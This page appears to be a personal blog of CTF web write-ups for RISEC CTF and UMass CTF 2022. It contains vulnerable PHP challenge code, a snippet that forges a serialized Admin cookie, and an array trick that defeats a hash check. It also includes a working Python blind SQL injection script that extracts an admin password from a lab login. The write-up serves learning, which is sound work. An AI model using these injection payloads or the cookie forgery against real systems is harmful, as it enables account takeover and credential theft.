GiongfNef
  • 📧Readme
  • 💰Bug Bounty
    • Business Logic: Bypass 2FA to ATO
    • 1 Click Account Take Over
  • 🥑CVE
    • CVE-2024-40492: Stored XSS to ATO
    • CVE-2023-5311
  • ☕Writeup CTF
    • Crypto
      • dvCTF 2022
      • Crew CTF 2022
      • ångstromCTF 2022
      • picoCTF 2022 + wscCTF 2022
      • Securinets CTF Quals 2022
      • NsuCrypto
      • KMA chall 2022
      • SEETF 2022
      • just CTF 2022
      • zer0pts CTF 2022
    • Web
      • ASCIS 2022 - warm up
      • RISEC CTF + UMass CTF 2022
      • LIT 2022
      • UIUCTF 2022
      • nullcon CTF2022
      • 🎃Hack The Boo 2022
    • Writeup Intigriti challenge-0923
  • 🍄Linh tinh ký sự
    • 📚Books
    • note linh tinh
      • 🐞Bug logic Shopee: Giảm 5-10% khi mua sản phẩm ?
      • 💎Financial Aid Application for Coursera
  • 🫖Wargame && Others
    • 🍀OverTheWire: Bandit
      • 🌱OverTheWire: Bandit 2022 (new)
      • 🍃OverTheWire: (old) - Bandit
      • Writeup EVABSv5.apk (12levels)
    • 📲Android
      • 📲Writeup EVABSv5.apk (Solution 12 levels)
      • 🎮Writeup droids PicoCTF - (Solution 5 levels)
    • 🌵Rootme
      • 🏝️Web - Server
      • 📟App - System
        • 🎰ELF x86 - Format string bug basic 1
        • 🐰ELF x86 - Stack buffer overflow basic 1
        • 🦊ELF x86 - Stack buffer overflow basic 2
        • 🐻ELF x86 - Stack buffer overflow basic 3
        • 🐼ELF x86 - Stack buffer overflow basic 4
        • 🐧ELF x86 - Stack buffer overflow basic 6
    • 🏆Pentest
    • 🖇️Blockchain
Powered by GitBook
On this page
  • RISEC CTF
  • Pretty Horrible Program 1
  • Pretty Horrible Program 2
  • Pretty Horrible Program 3
  • UMass CTF
  • venting
Edit on GitHub
  1. Writeup CTF
  2. Web

RISEC CTF + UMass CTF 2022

Note : A JOURNEY TO GAIN KNOWLEDGE

Web Challenge

RISEC CTF

Pretty Horrible Program 1

  <?php
  if (isset($_GET['bingus'])) {
    $input = $_GET['bingus'];
    $to_replace = 'bingus';
    $clean_string = preg_replace("/$to_replace/", '', $input);
    echo "<p>Your string is: $clean_string</p>";
    if ($clean_string == $to_replace) {
      echo "<h2 class=\"answer\">Bingus <span style=\"color: green;\">IS</span> your beloved</h2>";
      output_flag();
    } else {
      echo "<h2 class=\"answer\">Bingus <span style=\"color: red;\">IS NOT</span> your beloved</h2>";
    }
  }
  ?>
  • Notice that $clean_string genererated by replacing

  • So that we just input something that after replacing. it's equal to 'bingus'

demo:

Pretty Horrible Program 2

class User
  {
    public $role = 'Admin'; 	
}

$default_user = new User;
$_COOKIE = serialize($default_user);
setcookie(
    'user',
    serialize($default_user)
  );
$a=unserialize($_COOKIE);
echo "$_COOKIE"

Pretty Horrible Program 3

<?php
  if (isset($_GET['input1']) and isset($_GET['input2'])) {
    if ($_GET['input1'] == $_GET['input2']) {
      print '<h3 class="error">Nice try, but it won\'t be that easy ;)</h3>';
    } else if (hash("sha256", $_GET['input1']) === hash("sha256", $_GET['input2'])) {
      output_flag();
    } else {
      print '<h3 class="error">Your inputs don\'t match</h3>';
    }
  }
  ?>
  <p>See if you can make the sha256 hashes match</p>
  <br />
  <a href="/php3/index.php?source=true">Source Code</a>
  <form method="get">
    <input type="text" required name="input1" placeholder="Input 1" />
    <p>Hash: <?php if (isset($_GET['input1'])) print hash("sha256", $_GET['input1']) ?></p>
    <input type="text" required name="input2" placeholder="Input 2" />
    <p>Hash: <?php if (isset($_GET['input2'])) print hash("sha256", $_GET['input2']) ?></p>
    <input type="submit" />
  </form>
</body>

</html>
<?php

Workflow:

  • Now you just put [] in input and get flag.

UMass CTF

venting

  • when you connectn try to see history in burpsuite, you can get the link redirect to the login page

  • Now read the hint with 'admin' in user and password does't have fillter so that mean that may be SQLI. Exactly. that's is blind SQLI

otherway, try to bruteforce by python request:

import requests, string

url = "http://localhost:49153/fff5bf676ba8796f0c51033403b35311/login"
s = requests.session()

passwordRetrieve = ""
# ' or (select 'a' from users where username='admin' and length(Password)>36)='a

def solve():
    global passwordRetrieve
    index = 0
    while True:
        for char in string.printable:
            usernamefield = "\\"
            passwordfield = f"' or (select 'a' from users where username='admin' and substr(Password,{index},1)='{char}')='a"
            postParam = {'user': usernamefield, 'pass': passwordfield}
            response = s.post(url, data=postParam).text
            if "Invalid" not in response:
                passwordRetrieve += char
                index += 1
                print(passwordRetrieve)
                break
        if (index == 37):
            break
SELECT * from users WHERE username='admin\' AND Password = ''or 'True'
solve()

Contact:

PreviousASCIS 2022 - warm upNextLIT 2022

Last updated 2 years ago

At first, i just try to find around the key work "SHA256 collision" but we got , it takes about ≈3.6×1013 years to find, so that it's not a practical option.

After that i focused on '==' in php. Searching around and i got and

This challenge ended and the website was turned off. So i build it in docker from

I solve this challenge by burpsuite as same as

Thanks for reading. Have a good day !

☕
❤️
this one
this
this
here
this lab
facebook